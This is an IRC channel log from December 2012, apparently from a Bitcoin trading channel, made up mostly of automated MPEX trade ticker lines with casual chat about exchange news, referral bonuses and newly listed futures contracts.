17069 @ 0.00051476 = 8.7864 BTC [-] Dec 10 10:28:57 [MPEX] [S.MPOE] 1828 @ 0.00051476 = 0.941 BTC [-] Dec 10 10:28:58 [MPEX] [S.MPOE] 23200 @ 0.00051466 = 11.9401 BTC [-] Dec 10 10:28:59 [MPEX] [S.MPOE] 799 @ 0.00051459 = 0.4112 BTC [-] Dec 10 10:47:42 [MPEX] [S.MPOE] 4050 @ 0.0005167 = 2.0926 BTC [+] Dec 10 10:56:50 [MPEX] [S.MPOE] 19183 @ 0.00051459 = 9.8714 BTC [-] Dec 10 11:00:17 [MPEX] [S.MPOE] 271 @ 0.0005167 = 0.14 BTC [+] Dec 10 11:00:18 [MPEX] [S.MPOE] 7893 @ 0.00051702 = 4.0808 BTC [+] Dec 10 11:08:42 [MPEX] [S.MPOE] 4321 @ 0.00051488 = 2.2248 BTC [-] Dec 10 11:08:43 [MPEX] [S.MPOE] 7468 @ 0.00051459 = 3.843 BTC [-] Dec 10 11:08:45 [MPEX] [S.MPOE] 5750 @ 0.00051452 = 2.9585 BTC [-] Dec 10 11:08:45 [MPEX] [S.MPOE] 4600 @ 0.00051407 = 2.3647 BTC [-] Dec 10 11:08:46 [MPEX] [S.MPOE] 16445 @ 0.00051405 = 8.4536 BTC [-] Dec 10 11:24:26 [MPEX] [S.MPOE] 7797 @ 0.00051405 = 4.008 BTC [-] Dec 10 11:24:26 [MPEX] [S.MPOE] 18937 @ 0.0005132 = 9.7185 BTC [-] Dec 10 11:32:31 [MPEX] [S.MPOE] 3450 @ 0.0005147 = 1.7757 BTC [+] Dec 10 11:32:32 [MPEX] [S.MPOE] 16550 @ 0.0005132 = 8.4935 BTC [-] Dec 10 11:48:43 [MPEX] [S.MPOE] 6367 @ 0.0005132 = 3.2675 BTC [-] Dec 10 11:48:43 [MPEX] [S.MPOE] 833 @ 0.00051284 = 0.4272 BTC [-] Dec 10 12:03:58 [MPEX] [S.MPOE] 17150 @ 0.00051284 = 8.7952 BTC [-] Dec 10 12:12:54 [MPEX] [S.MPOE] 4321 @ 0.00051611 = 2.2301 BTC [+] Dec 10 12:12:56 [MPEX] [S.MPOE] 11129 @ 0.00051631 = 5.746 BTC [+] Dec 10 12:13:45 [MPEX] [S.MPOE] 4321 @ 0.00051615 = 2.2303 BTC [-] Dec 10 12:13:45 [MPEX] [S.MPOE] 4408 @ 0.00051631 = 2.2759 BTC [+] Dec 10 12:15:56 [MPEX] [S.MPOE] 4321 @ 0.00051612 = 2.2302 BTC [-] Dec 10 12:15:57 [MPEX] [S.MPOE] 10263 @ 0.00051631 = 5.2989 BTC [+] Dec 10 12:15:59 [MPEX] [S.MPOE] 22466 @ 0.00051702 = 11.6154 BTC [+] Dec 10 12:30:39 'allo peeps Dec 10 12:31:23 been away for a while (shortly before the bitcoinica collapse) ... know about the glbse drama, what else has been happening? Dec 10 12:33:31 http://trilema.com/2012/the-bitcoin-drama-timeline/ Dec 10 12:33:35 should bring you up to speed. Dec 10 12:35:07 reading... thanks Dec 10 12:38:20 [MPEX] [S.MPOE] 4321 @ 0.00051302 = 2.2168 BTC [-] Dec 10 12:38:20 [MPEX] [S.MPOE] 37343 @ 0.00051284 = 19.151 BTC [-] Dec 10 12:38:20 [MPEX] [S.MPOE] 13386 @ 0.00051276 = 6.8638 BTC [-] Dec 10 13:07:47 [MPEX] [S.MPOE] 4321 @ 0.00051337 = 2.2183 BTC [+] Dec 10 13:07:47 [MPEX] [S.MPOE] 14529 @ 0.00051339 = 7.459 BTC [+] Dec 10 13:17:17 [MPEX] [S.MPOE] 843 @ 0.00051339 = 0.4328 BTC [+] Dec 10 13:17:27 [MPEX] [S.MPOE] 14007 @ 0.00051702 = 7.2419 BTC [+] Dec 10 13:23:59 well... that doesn't look good. Dec 10 13:28:31 ok, pretty big news over here : http://trilema.com/2012/the-bitcoin-drama-timeline/ Dec 10 13:28:36 smickles jurov ^ Dec 10 13:29:14 [MPEX] [S.MPOE] 4321 @ 0.00051302 = 2.2168 BTC [-] Dec 10 13:29:16 [MPEX] [S.MPOE] 11264 @ 0.00051276 = 5.7757 BTC [-] Dec 10 13:29:21 [MPEX] [S.MPOE] 4065 @ 0.0005127 = 2.0841 BTC [-] Dec 10 13:31:21 [MPEX] [X.EWTI] 1000 @ 0.066794 = 66.794 BTC Dec 10 13:32:07 [MPEX] [X.MGCG] 5 @ 0.13220833 = 0.661 BTC Dec 10 13:34:55 [MPEX] [X.MGCG] 100 @ 0.13220833 = 13.2208 BTC Dec 10 13:34:57 oh noes, don't tell me you've taken up dragon's tale. I saw someone get many btc loans to get out of the hole they got into on that Dec 10 13:35:08 markedathome i made like 100 btc. Dec 10 13:36:16 [MPEX] [S.MPOE] 1650 @ 0.00051694 = 0.853 BTC [+] Dec 10 13:36:24 better return than satoshidice? or more variable in luck? Dec 10 13:37:34 i never played much satoshidice Dec 10 13:37:40 and i absolutely never won. Dec 10 13:38:37 [MPEX] [S.MPOE] 2671 @ 0.00051694 = 1.3807 BTC [+] Dec 10 13:38:41 [MPEX] [S.MPOE] 14434 @ 0.00051702 = 7.4627 BTC [+] Dec 10 13:38:41 [MPEX] [S.MPOE] 7570 @ 0.00051799 = 3.9212 BTC [+] Dec 10 13:38:41 [MPEX] [S.MPOE] 42500 @ 0.00051925 = 22.0681 BTC [+] Dec 10 13:38:42 [MPEX] [S.MPOE] 5600 @ 0.00052016 = 2.9129 BTC [+] Dec 10 13:38:42 [MPEX] [S.MPOE] 16300 @ 0.00052043 = 8.483 BTC [+] Dec 10 13:38:42 [MPEX] [S.MPOE] 13218 @ 0.00052054 = 6.8805 BTC [+] Dec 10 13:38:42 [MPEX] [S.MPOE] 26900 @ 0.00052057 = 14.0033 BTC [+] Dec 10 13:38:42 [MPEX] [S.MPOE] 16450 @ 0.00052102 = 8.5708 BTC [+] Dec 10 13:38:43 [MPEX] [S.MPOE] 2778 @ 0.00052586 = 1.4608 BTC [+] Dec 10 13:38:44 [MPEX] [S.MPOE] 6663 @ 0.00052643 = 3.5076 BTC [+] Dec 10 13:38:45 [MPEX] [S.MPOE] 25952 @ 0.00052697 = 13.6759 BTC [+] Dec 10 13:38:46 [MPEX] [S.MPOE] 23350 @ 0.00052786 = 12.3255 BTC [+] Dec 10 13:38:48 [MPEX] [S.MPOE] 8486 @ 0.00052944 = 4.4928 BTC [+] Dec 10 13:38:49 [MPEX] [S.MPOE] 9326 @ 0.00052959 = 4.939 BTC [+] Dec 10 13:38:50 [MPEX] [S.MPOE] 11850 @ 0.00052962 = 6.276 BTC [+] Dec 10 13:38:51 [MPEX] [S.MPOE] 28900 @ 0.00053012 = 15.3205 BTC [+] Dec 10 13:38:52 [MPEX] [S.MPOE] 9500 @ 0.00053025 = 5.0374 BTC [+] Dec 10 13:38:52 [MPEX] [S.MPOE] 14250 @ 0.00053079 = 7.5638 BTC [+] Dec 10 13:38:54 [MPEX] [S.MPOE] 27330 @ 0.00053116 = 14.5166 BTC [+] Dec 10 13:38:54 [MPEX] [S.MPOE] 28822 @ 0.00053159 = 15.3215 BTC [+] Dec 10 13:38:55 [MPEX] [S.MPOE] 15700 @ 0.00053192 = 8.3511 BTC [+] Dec 10 13:38:56 [MPEX] [S.MPOE] 47200 @ 0.00053226 = 25.1227 BTC [+] Dec 10 13:38:57 [MPEX] [S.MPOE] 1971 @ 0.00053253 = 1.0496 BTC [+] Dec 10 13:38:58 [MPEX] [S.MPOE] 11250 @ 0.00053262 = 5.992 BTC [+] Dec 10 13:38:59 [MPEX] [S.MPOE] 7089 @ 0.00053273 = 3.7765 BTC [+] Dec 10 13:39:00 [MPEX] [S.MPOE] 30000 @ 0.00053275 = 15.9825 BTC [+] Dec 10 13:39:01 [MPEX] [S.MPOE] 15603 @ 0.00053321 = 8.3197 BTC [+] Dec 10 13:39:01 [MPEX] [S.MPOE] 39377 @ 0.00053329 = 20.9994 BTC [+] Dec 10 13:39:02 [MPEX] [S.MPOE] 12300 @ 0.00053339 = 6.5607 BTC [+] Dec 10 13:39:03 [MPEX] [S.MPOE] 36032 @ 0.00053343 = 19.2205 BTC [+] Dec 10 13:39:04 [MPEX] [S.MPOE] 7050 @ 0.00053348 = 3.761 BTC [+] Dec 10 13:39:04 o you likey futures ? cool! Dec 10 13:39:05 [MPEX] [S.MPOE] 10300 @ 0.00053358 = 5.4959 BTC [+] Dec 10 13:39:06 [MPEX] [S.MPOE] 21800 @ 0.00053371 = 11.6349 BTC [+] Dec 10 13:39:07 [MPEX] [S.MPOE] 25315 @ 0.00053381 = 13.5134 BTC [+] Dec 10 13:39:08 [MPEX] [S.MPOE] 3750 @ 0.00053381 = 2.0018 BTC [+] Dec 10 13:39:09 [MPEX] [S.MPOE] 22400 @ 0.00053384 = 11.958 BTC [+] Dec 10 13:39:10 [MPEX] [S.MPOE] 25800 @ 0.00053384 = 13.7731 BTC [+] Dec 10 13:39:14 [MPEX] [S.MPOE] 38000 @ 0.00053391 = 20.2886 BTC [+] Dec 10 13:39:14 [MPEX] [S.MPOE] 6000 @ 0.00053395 = 3.2037 BTC [+] Dec 10 13:39:14 [MPEX] [S.MPOE] 47873 @ 0.00053395 = 25.5618 BTC [+] Dec 10 13:39:14 [MPEX] [S.MPOE] 30350 @ 0.00053398 = 16.2063 BTC [+] Dec 10 13:39:18 [MPEX] [S.MPOE] 1990 @ 0.00053409 = 1.0628 BTC [+] Dec 10 13:39:21 [MPEX] [S.MPOE] 155 @ 0.00053409 = 0.0828 BTC [+] Dec 10 13:39:57 is that a bot? Dec 10 13:40:38 that which is trading, not the posting Dec 10 13:48:37 [MPEX] [S.MPOE] 7250 @ 0.00052861 = 3.8324 BTC [-] Dec 10 13:55:11 [MPEX] [S.MPOE] 8850 @ 0.00052861 = 4.6782 BTC [-] Dec 10 13:55:12 [MPEX] [S.MPOE] 15855 @ 0.00053409 = 8.468 BTC [+] Dec 10 13:55:14 [MPEX] [S.MPOE] 28700 @ 0.00053426 = 15.3333 BTC [+] Dec 10 13:55:17 markedathome possibly Dec 10 13:55:22 [MPEX] [S.MPOE] 5396 @ 0.00053427 = 2.8829 BTC [+] Dec 10 13:55:22 [MPEX] [S.MPOE] 15400 @ 0.00053433 = 8.2287 BTC [+] Dec 10 13:55:22 [MPEX] [S.MPOE] 4149 @ 0.00053436 = 2.2171 BTC [+] Dec 10 13:55:22 [MPEX] [S.MPOE] 34350 @ 0.00053445 = 18.3584 BTC [+] Dec 10 13:55:22 [MPEX] [S.MPOE] 7850 @ 0.00053454 = 4.1961 BTC [+] Dec 10 13:55:23 [MPEX] [S.MPOE] 31500 @ 0.00053454 = 16.838 BTC [+] Dec 10 13:55:23 [MPEX] [S.MPOE] 20400 @ 0.00053477 = 10.9093 BTC [+] Dec 10 13:55:24 [MPEX] [S.MPOE] 27950 @ 0.0005349 = 14.9505 BTC [+] Dec 10 13:55:24 [MPEX] [S.MPOE] 12350 @ 0.00053506 = 6.608 BTC [+] Dec 10 13:55:24 [MPEX] [S.MPOE] 18700 @ 0.0005352 = 10.0082 BTC [+] Dec 10 13:55:25 [MPEX] [S.MPOE] 8550 @ 0.00053522 = 4.5761 BTC [+] Dec 10 13:57:00 just found coinbr.... anyone want to supply me with a referral code? Dec 10 13:58:29 i didn't know you needed referral codes for coinbr Dec 10 13:58:38 ping jurov for one Dec 10 13:59:22 you don't, anyone who refers gets some portion of that new users fees as a referral bonus. Dec 10 14:01:52 nice **** ENDING LOGGING AT Mon Dec 10 14:05:50 2012 **** BEGIN LOGGING AT Mon Dec 10 14:27:10 2012 Dec 10 14:32:02 what the current price for mpex accounts? Dec 10 14:32:13 30 IIRC Dec 10 14:32:14 25btc Dec 10 14:32:21 thank you Dec 10 14:32:48 kakobrekla: where do you get that from? Dec 10 14:33:27 use a referral souch as 27AF75321F2489E8 Dec 10 14:33:28 and its 25 Dec 10 14:33:46 hehe yeah, if you use an already reg'd fingerprint each gets 5 btc Dec 10 14:34:45 [MPEX] [S.MPOE] 4155 @ 0.00053534 = 2.2243 BTC [-] Dec 10 14:34:47 [MPEX] [S.MPOE] 23945 @ 0.00053535 = 12.819 BTC [+] Dec 10 14:35:06 [MPEX] [X.INDQ] 200 @ 0.20633112 = 41.2662 BTC Dec 10 14:40:15 x what Dec 10 14:45:24 [MPEX] [S.MPOE] 3088 @ 0.00053535 = 1.6532 BTC [+] Dec 10 14:45:25 [MPEX] [S.MPOE] 12462 @ 0.00053539 = 6.672 BTC [+] Dec 10 14:47:33 kakobrekla http://trilema.com/2012/futures-on-mpex/ Dec 10 14:49:33 my traders say 2% is high Dec 10 14:51:20 possibly so. Dec 10 14:51:44 i plan to adjust both the collateral % and the fee Dec 10 14:52:52 also marketmakers aren't fee'd. Dec 10 14:57:47 [MPEX] [S.MPOE] 10481 @ 0.00053531 = 5.6106 BTC [-] Dec 10 14:57:48 [MPEX] [S.MPOE] 13600 @ 0.00052725 = 7.1706 BTC [-] Dec 10 14:57:50 [MPEX] [S.MPOE] 3850 @ 0.00052592 = 2.0248 BTC [-] Dec 10 15:06:18 [MPEX] [S.MPOE] 3819 @ 0.00051885 = 1.9815 BTC [-] Dec 10 15:07:21 jurov: ? Dec 10 15:07:58 ah Dec 10 15:10:34 markedathome: Try https://coinbr.com/ref?c=e4XGKaHD77 Dec 10 15:11:20 thanks. will sign up shortly, but probably not put that much through for a couple of weeks or so. Dec 10 15:11:58 bnk Dec 10 15:12:47 [MPEX] [S.MPOE] 5688 @ 0.00053539 = 3.0453 BTC [+] Dec 10 15:12:49 [MPEX] [S.MPOE] 22600 @ 0.00053542 = 12.1005 BTC [+] Dec 10 15:12:50 [MPEX] [S.MPOE] 11900 @ 0.00053555 = 6.373 BTC [+] Dec 10 15:12:51 [MPEX] [S.MPOE] 4850 @ 0.00053561 = 2.5977 BTC [+] Dec 10 15:12:52 [MPEX] [S.MPOE] 9928 @ 0.00053562 = 5.3176 BTC [+] Dec 10 15:12:54 [MPEX] [S.MPOE] 24759 @ 0.00053562 = 13.2614 BTC [+] Dec 10 15:12:55 [MPEX] [S.MPOE] 30095 @ 0.00053576 = 16.1237 BTC [+] Dec 10 15:12:55 [MPEX] [S.MPOE] 8050 @ 0.00053582 = 4.3134 BTC [+] Dec 10 15:12:56 [MPEX] [S.MPOE] 10900 @ 0.00053593 = 5.8416 BTC [+] Dec 10 15:12:57 [MPEX] [S.MPOE] 31900 @ 0.00053594 = 17.0965 BTC [+] Dec 10 15:12:58 [MPEX] [S.MPOE] 32140 @ 0.00053598 = 17.2264 BTC [+] Dec 10 15:12:59 [MPEX] [S.MPOE] 7190 @ 0.00053601 = 3.8539 BTC [+] Dec 10 15:13:16 [MPEX] [S.MPOE] 8660 @ 0.00053601 = 4.6418 BTC [+] Dec 10 15:13:18 [MPEX] [S.MPOE] 10400 @ 0.00053604 = 5.5748 BTC [+] Dec 10 15:13:19 [MPEX] [S.MPOE] 264 @ 0.00053607 = 0.1415 BTC [+] Dec 10 15:23:22 mircea_popescu: oh... I thought only the sponsor would get 5 BTC Dec 10 15:23:28 no, both. Dec 10 15:23:38 I would have looked for one ;-) Dec 10 15:23:44 http://polimedia.us/bitcoin/faq.html#13 Dec 10 15:23:53 "If you already have an account and someone mentions your keyid when they sign up for a new account each of you will be credited 5 BTC." Dec 10 15:23:57 I know, I've just read it again Dec 10 15:24:01 a ok Dec 10 15:24:05 I missed the "each of you" Dec 10 15:24:36 it's supposed to work as a simple way for 3rd party developers to finance themselves. Dec 10 15:24:57 make X service, have a user sign-up a day, suddenly you're making 150 btc a month. Dec 10 15:25:32 [MPEX] [S.MPOE] 11686 @ 0.00053607 = 6.2645 BTC [+] Dec 10 15:25:34 [MPEX] [S.MPOE] 6114 @ 0.00053627 = 3.2788 BTC [+] Dec 10 15:26:56 [MPEX] [X.MSIG] 50 @ 0.25711156 = 12.8556 BTC Dec 10 15:27:03 [MPEX] [X.MGCG] 150 @ 0.13220833 = 19.8312 BTC Dec 10 15:42:59 fuck, looks like bitvps screwed my connection again Dec 10 15:46:02 [MPEX] [S.MPOE] 4321 @ 0.0005296 = 2.2884 BTC [-] Dec 10 15:46:03 [MPEX] [S.MPOE] 5117 @ 0.00052934 = 2.7086 BTC [-] Dec 10 15:48:28 [MPEX] [S.MPOE] 4321 @ 0.00053128 = 2.2957 BTC [+] Dec 10 15:48:29 [MPEX] [S.MPOE] 5940 @ 0.00053135 = 3.1562 BTC [+] Dec 10 15:50:27 has anyone a way to contact rg directly? i filed a ticket, but don't want to wait 12hrs again Dec 10 15:52:29 https://bitcointalk.org/index.php?topic=130074.0 Dec 10 15:52:43 [MPEX] [S.MPOE] 4321 @ 0.00052961 = 2.2884 BTC [-] Dec 10 15:52:44 [MPEX] [S.MPOE] 27879 @ 0.00052934 = 14.7575 BTC [-] Dec 10 16:03:58 [MPEX] [S.MPOE] 5600 @ 0.00053082 = 2.9726 BTC [+] Dec 10 16:04:00 [MPEX] [S.MPOE] 4321 @ 0.00053127 = 2.2956 BTC [+] Dec 10 16:04:01 [MPEX] [S.MPOE] 3660 @ 0.00053135 = 1.9447 BTC [+] Dec 10 16:04:02 [MPEX] [S.MPOE] 3619 @ 0.00053627 = 1.9408 BTC [+] Dec 10 16:13:54 [MPEX] [S.MPOE] 4321 @ 0.00052941 = 2.2876 BTC [-] Dec 10 16:13:56 [MPEX] [S.MPOE] 4054 @ 0.00052934 = 2.1459 BTC [-] Dec 10 16:13:56 [MPEX] [S.MPOE] 8961 @ 0.0005291 = 4.7413 BTC [-] Dec 10 16:13:57 [MPEX] [S.MPOE] 4200 @ 0.00052862 = 2.2202 BTC [-] Dec 10 16:13:58 [MPEX] [S.MPOE] 6264 @ 0.00052678 = 3.2997 BTC [-] Dec 10 16:24:18 [MPEX] [S.MPOE] 4321 @ 0.00053178 = 2.2978 BTC [+] Dec 10 16:24:20 [MPEX] [S.MPOE] 17200 @ 0.0005315 = 9.1418 BTC [-] Dec 10 16:24:21 [MPEX] [S.MPOE] 1056 @ 0.00052678 = 0.5563 BTC [-] Dec 10 16:28:41 [MPEX] [S.MPOE] 2653 @ 0.00052678 = 1.3975 BTC [-] Dec 10 16:33:02 [MPEX] [S.MPOE] 21600 @ 0.00052541 = 11.3489 BTC [-] Dec 10 16:39:26 [MPEX] [S.MPOE] 4321 @ 0.00052192 = 2.2552 BTC [-] Dec 10 16:39:27 [MPEX] [S.MPOE] 24053 @ 0.00052191 = 12.5535 BTC [-] Dec 10 16:42:33 [MPEX] [S.MPOE] 4321 @ 0.00052525 = 2.2696 BTC [+] Dec 10 16:42:34 [MPEX] [S.MPOE] 5279 @ 0.00052541 = 2.7736 BTC [+] Dec 10 16:47:28 [MPEX] [S.MPOE] 4321 @ 0.00052197 = 2.2554 BTC [-] Dec 10 16:47:30 [MPEX] [S.MPOE] 7647 @ 0.00052191 = 3.991 BTC [-] Dec 10 16:47:31 [MPEX] [S.MPOE] 9632 @ 0.00051331 = 4.9442 BTC [-] Dec 10 16:53:15 [MPEX] [S.MPOE] 12988 @ 0.00051331 = 6.6669 BTC [-] Dec 10 16:54:39 coinbr.com finally back online, without any word from james or anyone Dec 10 16:55:00 https://bitcointalk.org/index.php?topic=130082.0 Dec 10 16:55:02 hehe Dec 10 16:55:59 ooohhh Dec 10 16:56:53 *digs quickly to db to add'em all to coinbr* Dec 10 17:07:40 [MPEX] [S.MPOE] 5580 @ 0.00051331 = 2.8643 BTC [-] Dec 10 17:07:41 [MPEX] [S.MPOE] 6285 @ 0.0005127 = 3.2223 BTC [-] Dec 10 17:07:43 [MPEX] [S.MPOE] 2585 @ 0.0005125 = 1.3248 BTC [-] Dec 10 17:10:22 ha!, i need to reset my cookie, but i can see that title mp Dec 10 17:17:31 mircea or anyone, these futures can be manually exercised like options? Dec 10 17:19:12 [MPEX] [S.MPOE] 6715 @ 0.0005125 = 3.4414 BTC [-] Dec 10 17:19:14 [MPEX] [S.MPOE] 435 @ 0.0005124 = 0.2229 BTC [-] Dec 10 17:37:47 [MPEX] [S.MPOE] 4365 @ 0.0005124 = 2.2366 BTC [-] Dec 10 17:37:48 [MPEX] [S.MPOE] 8777 @ 0.0005119 = 4.4929 BTC [-] Dec 10 17:41:41 [MPEX] [S.MPOE] 4321 @ 0.00052531 = 2.2699 BTC [+] Dec 10 17:41:42 [MPEX] [S.MPOE] 118 @ 0.00052541 = 0.062 BTC [+] Dec 10 17:48:34 [MPEX] [S.MPOE] 9251 @ 0.00053054 = 4.908 BTC [+] Dec 10 17:57:08 [MPEX] [S.MPOE] 4749 @ 0.00052231 = 2.4805 BTC [-] Dec 10 17:57:09 [MPEX] [S.MPOE] 4321 @ 0.00053599 = 2.316 BTC [+] Dec 10 17:57:11 [MPEX] [S.MPOE] 13189 @ 0.00053627 = 7.0729 BTC [+] Dec 10 17:57:12 [MPEX] [S.MPOE] 8400 @ 0.00053634 = 4.5053 BTC [+] Dec 10 17:57:13 [MPEX] [S.MPOE] 2041 @ 0.00053639 = 1.0948 BTC [+] Dec 10 18:08:34 [MPEX] [S.MPOE] 4321 @ 0.0005355 = 2.3139 BTC [-] Dec 10 18:08:35 [MPEX] [S.MPOE] 10979 @ 0.00053533 = 5.8774 BTC [-] Dec 10 18:10:39 [MPEX] [S.MPOE] 4321 @ 0.00053622 = 2.317 BTC [+] Dec 10 18:10:41 [MPEX] [S.MPOE] 4294 @ 0.00053639 = 2.3033 BTC [+] Dec 10 18:21:01 [MPEX] [S.MPOE] 4321 @ 0.00053632 = 2.3174 BTC [-] Dec 10 18:21:03 [MPEX] [S.MPOE] 17829 @ 0.00053639 = 9.5633 BTC [+] Dec 10 18:30:33 [MPEX] [S.MPOE] 4321 @ 0.00053552 = 2.314 BTC [-] Dec 10 18:30:35 [MPEX] [S.MPOE] 3579 @ 0.00053533 = 1.9159 BTC [-] Dec 10 18:31:58 also thrown to http://www.reddit.com/r/Bitcoin/comments/14lye7/trading_of_indexesprecious_metalscommodities/ Dec 10 18:32:37 [MPEX] [S.MPOE] 4321 @ 0.00053566 = 2.3146 BTC [+] Dec 10 18:32:39 [MPEX] [S.MPOE] 12079 @ 0.00053533 = 6.4663 BTC [-] Dec 10 18:45:08 [MPEX] [S.MPOE] 6163 @ 0.00053533 = 3.2992 BTC [-] Dec 10 18:45:09 [MPEX] [S.MPOE] 8387 @ 0.00053154 = 4.458 BTC [-] Dec 10 19:08:53 https://bitcointalk.org/index.php?topic=97755.msg1075018#msg1075018 << this is great Dec 10 19:13:15 so i have to ask, what is with the cherry lorry? Dec 10 19:16:27 markedathome some idiot kept bringing nonsensical/broken examples in a thread discussing patrick harnett Dec 10 19:17:27 [MPEX] [S.MPOE] 9849 @ 0.0005357 = 5.2761 BTC [+] Dec 10 19:17:32 the one where mpoe-pr was calling for the scamtag? i've just started to skim the thread on bitcointalk Dec 10 19:18:13 still needs a muzzel Dec 10 19:18:50 yeah Dec 10 19:19:03 jcpham you need to learn how to spell that one day lol Dec 10 19:19:23 ;;google muzzle Dec 10 19:19:24 Muzzle - Wikipedia, the free encyclopedia: ; Petco Nylon & Mesh Dog Muzzle at PETCO: ; muzzle - definition of muzzle by the Free Online Dictionary ...: Dec 10 19:19:38 my fingers are lzy Dec 10 19:19:52 keyboardism is sometimes fail Dec 10 19:20:01 get off my cock mircea_popescu Dec 10 19:20:29 lalala Dec 10 19:23:45 [MPEX] [S.MPOE] 10763 @ 0.00053154 = 5.721 BTC [-] Dec 10 19:23:47 [MPEX] [S.MPOE] 437 @ 0.00052796 = 0.2307 BTC [-] Dec 10 19:25:34 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.23833615 = 238.3362 BTC [+] Dec 10 19:25:35 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.29381295 = 293.813 BTC [+] Dec 10 19:25:40 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.19133839 = 191.3384 BTC [+] Dec 10 19:28:51 [MPEX] [S.MPOE] 6845 @ 0.0005357 = 3.6669 BTC [+] Dec 10 19:28:53 [MPEX] [S.MPOE] 12550 @ 0.00053639 = 6.7317 BTC [+] Dec 10 19:28:54 [MPEX] [S.MPOE] 86 @ 0.00053639 = 0.0461 BTC [+] Dec 10 19:28:55 [MPEX] [S.MPOE] 1869 @ 0.00053645 = 1.0026 BTC [+] Dec 10 19:33:51 [MPEX] [S.MPOE] 4321 @ 0.00053624 = 2.3171 BTC [-] Dec 10 19:33:53 [MPEX] [S.MPOE] 3231 @ 0.00053645 = 1.7333 BTC [+] Dec 10 19:33:54 [MPEX] [S.MPOE] 8461 @ 0.00053671 = 4.5411 BTC [+] Dec 10 19:52:01 [MPEX] [O.BTCUSD.C130T] 290 @ 0.12538418 = 36.3614 BTC [-] Dec 10 19:52:25 [MPEX] [X.IEDG] 50 @ 0.07767461 = 3.8837 BTC Dec 10 19:52:34 [MPEX] [X.INDQ] 50 @ 0.20633112 = 10.3166 BTC Dec 10 19:52:40 [MPEX] [X.INKG] 50 @ 0.07407914 = 3.704 BTC Dec 10 19:52:49 [MPEX] [X.ISP5] 50 @ 0.10896071 = 5.448 BTC Dec 10 20:01:31 [MPEX] [S.MPOE] 4321 @ 0.00053642 = 2.3179 BTC [-] Dec 10 20:01:32 [MPEX] [S.MPOE] 3779 @ 0.00053671 = 2.0282 BTC [+] Dec 10 20:02:34 Cool, the Futures Contracts are up on mpex! Dec 10 20:04:38 makomk markedathome maximian midnightmagic MiningBuddy mircea_popescu mod6 MrTiggr Dec 10 20:04:39 makomk markedathome maximian midnightmagic MiningBuddy mircea_popescu mod6 MrTiggr Dec 10 20:04:40 makomk markedathome maximian midnightmagic MiningBuddy mircea_popescu mod6 MrTiggr Dec 10 20:04:43 mod6 : Dec 10 20:04:44 D Dec 10 20:06:10 i have a feeling some people are really paid to troll on the forums Dec 10 20:06:12 excluding inaba Dec 10 20:06:17 I gotta add the MKFUT to bitotter, that shouldn't be hard. Dec 10 20:10:50 [MPEX] [S.MPOE] 4321 @ 0.00052798 = 2.2814 BTC [-] Dec 10 20:10:52 [MPEX] [S.MPOE] 21029 @ 0.00052796 = 11.1025 BTC [-] Dec 10 20:15:54 excluding inaba << priceless. Dec 10 20:16:18 mod6 shouldn't be too hard if you have mkopt Dec 10 20:19:17 [MPEX] [S.MPOE] 4321 @ 0.00053599 = 2.316 BTC [+] Dec 10 20:19:19 [MPEX] [S.MPOE] 4200 @ 0.00053626 = 2.2523 BTC [+] Dec 10 20:19:20 [MPEX] [S.MPOE] 1260 @ 0.00053671 = 0.6763 BTC [+] Dec 10 20:19:21 [MPEX] [S.MPOE] 9650 @ 0.00053683 = 5.1804 BTC [+] Dec 10 20:19:22 [MPEX] [S.MPOE] 13194 @ 0.00053708 = 7.0862 BTC [+] Dec 10 20:22:35 "It's been a long time and while I realize there is a huge demand for these units, I no longer wish to purchase them due to what amounts to an act of god regarding my financial position. So I will make the following request, sil vous plais;" Dec 10 20:22:39 usagi nao speaks french too. Dec 10 20:29:26 [MPEX] [S.MPOE] 17156 @ 0.00053708 = 9.2141 BTC [+] Dec 10 20:29:28 [MPEX] [S.MPOE] 6344 @ 0.00053708 = 3.4072 BTC [+] Dec 10 20:33:02 [MPEX] [S.MPOE] 4321 @ 0.00053192 = 2.2984 BTC [-] Dec 10 20:33:02 [MPEX] [S.MPOE] 18979 @ 0.00053185 = 10.094 BTC [-] Dec 10 20:35:47 mircea_popescu: yeah, just doing a bit of copy/replace :) Dec 10 20:36:12 :p Dec 10 20:38:00 gets mob9 Dec 10 20:38:09 Wop6 Dec 10 20:38:59 *pop* Dec 10 20:39:41 mircea_popescu: what is usagi up to now? Dec 10 20:40:07 https://bitcointalk.org/index.php?topic=110122.msg1376330#msg1376330 Dec 10 20:41:39 Ukto were'nt you doing weex ?! Dec 10 20:41:58 or am i confused Dec 10 20:42:31 haha, mod69 Dec 10 20:42:50 dom_perign96 Dec 10 20:43:41 anyway, getting that part in there was easy. i wish i didn't have any other jobs :( Dec 10 20:43:58 confused Dec 10 20:44:03 what does that thread have to do with weexchange? Dec 10 20:44:37 Ukto nothing to do with weex. Dec 10 20:44:47 and yes Dec 10 20:44:50 WeExchange is mine Dec 10 20:44:52 but, i meanwhile remember it was great's. you two working together ?! Dec 10 20:44:53 why? Dec 10 20:44:59 yes Dec 10 20:45:03 Graet* ah i see Dec 10 20:45:03 Graet is the Aussie director Dec 10 20:45:10 which allows us to handle AUD Dec 10 20:45:15 I handle USD and CAD Dec 10 20:45:22 aha Dec 10 20:45:36 cool. Dec 10 20:45:42 [MPEX] [S.MPOE] 4321 @ 0.0005321 = 2.2992 BTC [+] Dec 10 20:45:43 [MPEX] [S.MPOE] 2286 @ 0.00053185 = 1.2158 BTC [-] Dec 10 20:45:56 its one of the reasons why it appears we are the last exchange to natively handle AUD, you need an AU director Dec 10 20:46:04 pigeons https://bitcointalk.org/index.php?topic=121383.0 you in ? Dec 10 20:46:14 act of god lol Dec 10 20:46:48 act of milk. Dec 10 20:47:10 god made me retarded so I ripped you off Dec 10 20:51:37 [MPEX] [S.MPOE] 4321 @ 0.00053214 = 2.2994 BTC [+] Dec 10 20:51:38 [MPEX] [S.MPOE] 2435 @ 0.00053185 = 1.2951 BTC [-] Dec 10 20:51:40 [MPEX] [S.MPOE] 3044 @ 0.00052796 = 1.6071 BTC [-] Dec 10 20:52:52 what was the name of that race horse on glbse? Dec 10 20:54:10 misty something ? Dec 10 20:54:34 satoshis daemon? Dec 10 20:56:06 yeah that was it Dec 10 20:56:47 a rght you are Dec 10 21:00:30 [MPEX] [X.MPTG] 1 @ 0.12516851 BTC Dec 10 21:00:31 [MPEX] [X.INDQ] 1 @ 0.20633112 BTC Dec 10 21:00:33 [MPEX] [X.INKG] 1 @ 0.07407914 BTC Dec 10 21:00:34 [MPEX] [X.ISP5] 1 @ 0.10896071 BTC 